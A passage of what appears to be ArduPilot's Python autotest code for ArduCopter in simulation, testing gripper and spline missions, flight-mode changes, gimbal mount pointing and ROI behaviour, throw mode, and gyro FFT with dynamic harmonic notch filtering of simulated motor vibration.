self.load_mission("copter-gripper-mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.assert_vehicle_location_is_at_startup_location()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_statustext("Gripper Grabbed", timeout=60)
self.wait_statustext("Gripper Released", timeout=60)
except Exception as e:
self.print_exception_caught(e)
self.change_mode('LAND')
ex = e
self.context_pop()
self.wait_disarmed()
if ex is not None:
raise ex
def test_spline_last_waypoint(self):
self.context_push()
ex = None
try:
self.load_mission("copter-spline-last-waypoint.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_altitude(10, 3000, relative=True)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.do_RTL()
self.wait_disarmed()
if ex is not None:
raise ex
def fly_manual_throttle_mode_change(self):
self.set_parameter("FS_GCS_ENABLE", 0) # avoid GUIDED instant disarm
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("ACRO")
self.change_mode("STABILIZE")
self.change_mode("GUIDED")
self.set_rc(3, 1700)
self.watch_altitude_maintained(-1, 0.2) # should not take off in guided
self.run_cmd_do_set_mode(
"ACRO",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"STABILIZE",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"DRIFT",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.progress("Check setting an invalid mode")
self.run_cmd(
mavutil.mavlink.MAV_CMD_DO_SET_MODE,
mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
126,
0,
0,
0,
0,
0,
want_result=mavutil.mavlink.MAV_RESULT_FAILED,
timeout=1
)
self.set_rc(3, 1000)
self.run_cmd_do_set_mode("ACRO")
self.wait_disarmed()
def test_mount_pitch(self, despitch, despitch_tolerance, timeout=10, hold=0):
tstart = self.get_sim_time()
success_start = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Mount pitch not achieved")
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
# self.progress("pitch=%f roll=%f yaw=%f" %
# (m.pointing_a, m.pointing_b, m.pointing_c))
mount_pitch = m.pointing_a/100.0 # centidegrees to degrees
if abs(despitch - mount_pitch) > despitch_tolerance:
self.progress("Mount pitch incorrect: got=%f want=%f (+/- %f)" %
(mount_pitch, despitch, despitch_tolerance))
success_start = 0
continue
self.progress("Mount pitch correct: %f degrees == %f" %
(mount_pitch, despitch))
if success_start == 0:
success_start = now
continue
if now - success_start > hold:
self.progress("Mount pitch achieved")
return
def do_pitch(self, pitch):
'''pitch aircraft in guided/angle mode'''
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, math.radians(pitch), 0]), # att
0, # roll rate (rad/s)
1, # pitch rate
0, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
def test_mount(self):
ex = None
self.context_push()
old_srcSystem = self.mav.mav.srcSystem
self.mav.mav.srcSystem = 250
self.set_parameter("DISARM_DELAY", 0)
try:
            # start by disabling GCS failsafe, otherwise we immediately disarm
            # due to (apparently) not receiving traffic from the GCS for
            # too long. This is probably a function of --speedup
self.set_parameter("FS_GCS_ENABLE", 0)
self.progress("Setting up servo mount")
roll_servo = 5
pitch_servo = 6
yaw_servo = 7
self.set_parameter("MNT_TYPE", 1)
self.set_parameter("SERVO%u_FUNCTION" % roll_servo, 8) # roll
self.set_parameter("SERVO%u_FUNCTION" % pitch_servo, 7) # pitch
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 6) # yaw
self.reboot_sitl() # to handle MNT_TYPE changing
# make sure we're getting mount status and gimbal reports
self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
self.mav.recv_match(type='GIMBAL_REPORT',
blocking=True,
timeout=5)
# test pitch isn't stabilising:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff()
despitch = 10
despitch_tolerance = 3
self.progress("Pitching vehicle")
self.do_pitch(despitch) # will time out!
self.wait_pitch(despitch, despitch_tolerance)
# check we haven't modified:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.progress("Enable pitch stabilization using MOUNT_CONFIGURE")
self.mav.mav.mount_configure_send(
1, # target system
1, # target component
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0, # stab-roll
1, # stab-pitch
0)
self.do_pitch(despitch)
self.test_mount_pitch(-despitch, 1)
self.progress("Disable pitch using MAV_CMD_DO_MOUNT_CONFIGURE")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0)
self.progress("Point somewhere using MOUNT_CONTROL (ANGLE)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
20 * 100, # pitch
20 * 100, # roll (centidegrees)
0, # yaw
0 # save position
)
self.test_mount_pitch(20, 1)
self.progress("Point somewhere using MOUNT_CONTROL (GPS)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_GPS_POINT,
0,
0,
0,
0,
0,
0,
)
start = self.mav.location()
self.progress("start=%s" % str(start))
(t_lat, t_lon) = mavextra.gps_offset(start.lat, start.lng, 10, 20)
t_alt = 0
self.progress("loc %f %f %f" % (start.lat, start.lng, start.alt))
self.progress("targetting %f %f %f" % (t_lat, t_lon, t_alt))
self.do_pitch(despitch)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
int(t_lat * 1e7), # lat
int(t_lon * 1e7), # lon
t_alt * 100, # alt
0 # save position
)
self.test_mount_pitch(-52, 5)
            # now test RC targeting
            self.progress("Testing mount RC targeting")
# this is a one-off; ArduCopter *will* time out this directive!
self.progress("Levelling aircraft")
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, 0, 0]), # att
1, # roll rate (rad/s)
1, # pitch rate
1, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
try:
self.context_push()
self.set_parameter('MNT_RC_IN_ROLL', 11)
self.set_parameter('MNT_RC_IN_TILT', 12)
self.set_parameter('MNT_RC_IN_PAN', 13)
self.progress("Testing RC angular control")
# default RC min=1100 max=1900
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
self.test_mount_pitch(0, 1)
self.progress("Testing RC input down 1/4 of its range in the output, should be down 1/4 range in output")
rc12_in = 1400
rc12_min = 1100 # default
rc12_max = 1900 # default
angmin_tilt = -45.0 # default
angmax_tilt = 45.0 # default
expected_pitch = (float(rc12_in-rc12_min)/float(rc12_max-rc12_min) * (angmax_tilt-angmin_tilt)) + angmin_tilt
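                # worked numbers: (1400-1100)/(1900-1100) = 0.375;
                # 0.375 * (45 - -45) + -45 = -11.25 degrees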
self.progress("expected mount pitch: %f" % expected_pitch)
if expected_pitch != -11.25:
raise NotAchievedException("Calculation wrong - defaults changed?!")
self.set_rc(12, rc12_in)
self.test_mount_pitch(-11.25, 0.01)
self.set_rc(12, 1800)
self.test_mount_pitch(33.75, 0.01)
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
try:
self.progress(
"Issue https://discuss.ardupilot.org/t/"
"gimbal-limits-with-storm32-backend-mavlink-not-applied-correctly/51438"
)
self.context_push()
self.set_parameter("RC12_MIN", 1000)
self.set_parameter("RC12_MAX", 2000)
self.set_parameter("MNT_ANGMIN_TIL", -9000)
self.set_parameter("MNT_ANGMAX_TIL", 1000)
self.set_rc(12, 1000)
self.test_mount_pitch(-90.00, 0.01)
self.set_rc(12, 2000)
self.test_mount_pitch(10.00, 0.01)
self.set_rc(12, 1500)
self.test_mount_pitch(-40.00, 0.01)
finally:
self.context_pop()
self.set_rc(12, 1500)
self.progress("Testing RC rate control")
self.set_parameter('MNT_JSTICK_SPD', 10)
self.test_mount_pitch(0, 1)
self.set_rc(12, 1300)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-20, 1)
self.set_rc(12, 1700)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(0, 1)
self.test_mount_pitch(5, 1)
self.progress("Reverting to angle mode")
self.set_parameter('MNT_JSTICK_SPD', 0)
self.set_rc(12, 1500)
self.test_mount_pitch(0, 0.1)
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
self.context_pop()
raise e
self.progress("Testing mount ROI behaviour")
self.drain_mav_unparsed()
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_LOCATION")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_LOCATION,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-52, 5)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-7.5, 1)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT)")
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
)
self.test_mount_pitch(-7.5, 1)
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT), absolute-alt-frame")
# this is pointing essentially straight down
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL,
)
self.test_mount_pitch(-70, 1, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("Testing mount roi-sysid behaviour")
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_SYSID")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_SYSID,
250,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
0 * 1000, # mm alt amsl
0 * 1000, # relalt mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(-89, 5, hold=2)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
670 * 1000, # mm alt amsl
100 * 1000, # mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(68, 5, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("checking ArduCopter yaw-aircraft-for-roi")
try:
self.context_push()
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("current heading %u" % m.heading)
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 0) # yaw
self.progress("Waiting for check_servo_map to do its job")
self.delay_sim_time(5)
start = self.mav.location()
self.progress("Moving to guided/position controller")
# the following numbers are 1-degree-latitude and
# 0-degrees longitude - just so that we start to
# really move a lot.
self.fly_guided_move_global_relative_alt(1, 0, 0)
self.guided_achieve_heading(0)
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.wait_heading(110, timeout=600)
self.context_pop()
except Exception:
self.context_pop()
raise
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.mav.mav.srcSystem = old_srcSystem
self.disarm_vehicle(force=True)
self.reboot_sitl() # to handle MNT_TYPE changing
if ex is not None:
raise ex
def fly_throw_mode(self):
        # test "boomerang" behaviour: THROW mode, then an automatic switch to RTL:
self.progress("Throwing vehicle away")
self.set_parameters({
"THROW_NEXTMODE": 6,
"SIM_SHOVE_Z": -30,
"SIM_SHOVE_X": -20,
})
self.change_mode('THROW')
self.wait_ready_to_arm()
self.arm_vehicle()
try:
self.set_parameter("SIM_SHOVE_TIME", 500, retries=3)
except ValueError:
# the shove resets this to zero
pass
tstart = self.get_sim_time()
self.wait_mode('RTL')
max_good_tdelta = 15
tdelta = self.get_sim_time() - tstart
self.progress("Vehicle in RTL")
self.wait_rtl_complete()
self.progress("Vehicle disarmed")
if tdelta > max_good_tdelta:
raise NotAchievedException("Took too long to enter RTL: %fs > %fs" %
(tdelta, max_good_tdelta))
self.progress("Vehicle returned")
def hover_and_check_matched_frequency_with_fft(self, dblevel=-15, minhz=200, maxhz=300, peakhz=None, reverse=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
        # batch sampler defaults give a 1024-point FFT at a 1kHz sample rate, so roughly 1Hz/bin
freq = psd["F"][numpy.argmax(psd["X"][minhz:maxhz]) + minhz] * (1000. / 1024.)
peakdb = numpy.amax(psd["X"][minhz:maxhz])
if peakdb < dblevel or (peakhz is not None and abs(freq - peakhz) / peakhz > 0.05):
if reverse is not None:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
if reverse is not None:
raise NotAchievedException(
"Detected motor peak at %fHz, throttle %f%%, %fdB" %
(freq, vfr_hud.throttle, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
return freq, vfr_hud, peakdb
def fly_dynamic_notches(self):
"""Use dynamic harmonic notch to control motor noise."""
self.progress("Flying with dynamic notches")
self.context_push()
ex = None
try:
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100, # set the gyro filter high so we can observe behaviour
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
"SIM_GYR1_RND": 20,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 200, 300)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.,
"INS_HNTCH_HMNCS": 5, # first and third harmonic
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
})
self.reboot_sitl()
freq, vfr_hud, peakdb1 = self.hover_and_check_matched_frequency_with_fft(-10, 20, 350, reverse=True)
# now add double dynamic notches and check that the peak is squashed
self.set_parameter("INS_HNTCH_OPTS", 1)
self.reboot_sitl()
freq, vfr_hud, peakdb2 = self.hover_and_check_matched_frequency_with_fft(-15, 20, 350, reverse=True)
# double-notch should do better, but check for within 5%
if peakdb2 * 1.05 > peakdb1:
raise NotAchievedException(
"Double-notch peak was higher than single-notch peak %fdB > %fdB" %
(peakdb2, peakdb1))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def hover_and_check_matched_frequency(self, dblevel=-15, minhz=200, maxhz=300, fftLength=32, peakhz=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
        # batch sampler defaults give a 1024-point FFT and a 1kHz sample rate, so roughly 1Hz/bin
scale = 1000. / 1024.
sminhz = int(minhz * scale)
smaxhz = int(maxhz * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < dblevel:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
elif peakhz is not None and abs(freq - peakhz) / peakhz > 0.05:
raise NotAchievedException("Did not detect a motor peak at %fHz, found %fHz at %fdB" % (peakhz, freq, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
# we have a peak make sure that the FFT detected something close
# logging is at 10Hz
mlog = self.dfreader_for_current_onboard_log()
# accuracy is determined by sample rate and fft length, given our use of quinn we could probably use half of this
freqDelta = 1000. / fftLength
pkAvg = freq
nmessages = 1
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
freqs = []
while m is not None:
nmessages = nmessages + 1
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
# peak within resolution of FFT length
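        # (median rather than mean so occasional FTN1 mis-detections don't
        # skew the estimate)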
pkAvg = numpy.median(numpy.asarray(freqs))
self.progress("Detected motor peak at %fHz processing %d messages" % (pkAvg, nmessages))
        # peak must be within one FFT bin of the batch-sampler result:
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a motor peak at %f, found %f, wanted %f" % (dblevel, pkAvg, freq))
return freq
def fly_gyro_fft_harmonic(self):
"""Use dynamic harmonic notch to control motor noise with harmonic matching of the first harmonic."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT harmonic - Gyro sample rate")
self.context_push()
ex = None
        # we are dealing with probabilistic scenarios involving threads; have two bites at the cherry
try:
self.start_subtest("Hover to calculate approximate hover frequency")
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"FFT_THR_REF": self.get_parameter("MOT_THST_HOVER"),
"SIM_GYR1_RND": 20, # enable a noisy gyro
})
# motor peak enabling FFT will also enable the arming
# check, self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
})
# Step 1: inject actual motor noise and use the FFT to track it
self.set_parameters({
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 64)
# Step 2: add a second harmonic and check the first is still tracked
self.start_subtest("Add a fixed frequency harmonic at twice the hover frequency "
"and check the right harmonic is found")
self.set_parameters({
"SIM_VIB_FREQ_X": freq * 2,
"SIM_VIB_FREQ_Y": freq * 2,
"SIM_VIB_FREQ_Z": freq * 2,
"SIM_VIB_MOT_MULT": 0.25, # halve the motor noise so that the higher harmonic dominates
})
self.reboot_sitl()
self.hover_and_check_matched_frequency(-15, 100, 250, 64, None)
# Step 3: switch harmonics mid flight and check for tracking
self.start_subtest("Switch harmonics mid flight and check the right harmonic is found")
self.set_parameter("FFT_HMNC_PEAK", 0)
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 10
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_parameter("SIM_VIB_MOT_MULT", 5.0)
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
mlog = self.dfreader_for_current_onboard_log()
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
freqs = []
while m is not None:
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
# peak within resolution of FFT length, the highest energy peak switched but our detection should not
pkAvg = numpy.median(numpy.asarray(freqs))
freqDelta = 1000. / self.get_parameter("FFT_WINDOW_SIZE")
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a harmonic motor peak, found %f, wanted %f" % (pkAvg, freq))
# Step 4: dynamic harmonic
self.start_subtest("Enable dynamic harmonics and make sure both frequency peaks are attenuated")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 100, 350)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_HMNCS": 3,
"INS_HNTCH_MODE": 4,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.0,
"INS_HNTCH_ATT": 100,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_OPTS": 3,
})
self.reboot_sitl()
# 5db is far in excess of the attenuation that the double dynamic-harmonic notch is able
# to provide (-7dB on average), but without the notch the peak is around 20dB so still a safe test
self.hover_and_check_matched_frequency_with_fft(5, 100, 350, reverse=True)
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MULT": 1.0,
})
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# need a final reboot because weird things happen to your
# vehicle state when switching back from EKF type 10!
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gyro_fft(self):
"""Use dynamic harmonic notch to control motor noise."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT - Gyro sample rate")
self.context_push()
ex = None
try:
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"SIM_GYR1_RND": 20, # enable a noisy motor peak
})
# enabling FFT will also enable the arming check,
# self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
"FFT_WINDOW_SIZE": 128,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 0,
})
# Step 1: inject a very precise noise peak at 250hz and make sure the in-flight fft
# can detect it really accurately. For a 128 FFT the frequency resolution is 8Hz so
# a 250Hz peak should be detectable within 5%
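            # (1kHz sample rate / 128 bins = 7.8125Hz per bin; 5% of 250Hz
            # is 12.5Hz, i.e. the peak must land within about 1.6 bins)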
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 250,
"SIM_VIB_FREQ_Y": 250,
"SIM_VIB_FREQ_Z": 250,
})
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 128, 250)
# Step 1b: run the same test with an FFT length of 256 which is needed to flush out a
# whole host of bugs related to uint8_t. This also tests very accurately the frequency resolution
self.set_parameter("FFT_WINDOW_SIZE", 256)
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 256, 250)
self.set_parameter("FFT_WINDOW_SIZE", 128)
# Step 2: inject actual motor noise and use the standard length FFT to track it
self.start_subtest("Hover and check that the FFT can find the motor noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 32,
"FFT_WINDOW_OLAP": 0.5,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 32)
self.set_parameter("SIM_VIB_MOT_MULT", 1.)
# Step 3: add a FFT dynamic notch and check that the peak is squashed
self.start_subtest("Add a dynamic notch, hover and check that the noise peak is now gone")
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": 1.0,
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_MODE": 4,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# fly fast forrest!
self.set_rc(3, 1900)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.set_rc(3, 1500)
self.set_rc(2, 1500)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
            # batch sampler defaults give a 1024-point FFT and a 1kHz sample rate, so roughly 1Hz/bin
scale = 1000. / 1024.
sminhz = int(100 * scale)
smaxhz = int(350 * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < 0:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Detected %fHz motor peak at %fdB" % (freq, peakdb))
# Step 4: loop sample rate test with larger window
self.start_subtest("Hover and check that the FFT can find the motor noise when running at fast loop rate")
# we are limited to half the loop rate for frequency detection
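            # (FFT_SAMPLE_MODE=1 samples at the scheduler loop rate; assuming
            # the default 400Hz copter loop rate, Nyquist limits detection to
            # just under 200Hz, hence FFT_MAXHZ=185)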
self.set_parameters({
"FFT_MAXHZ": 185,
"INS_LOG_BAT_OPT": 0,
"SIM_VIB_MOT_MAX": 220,
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 1,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
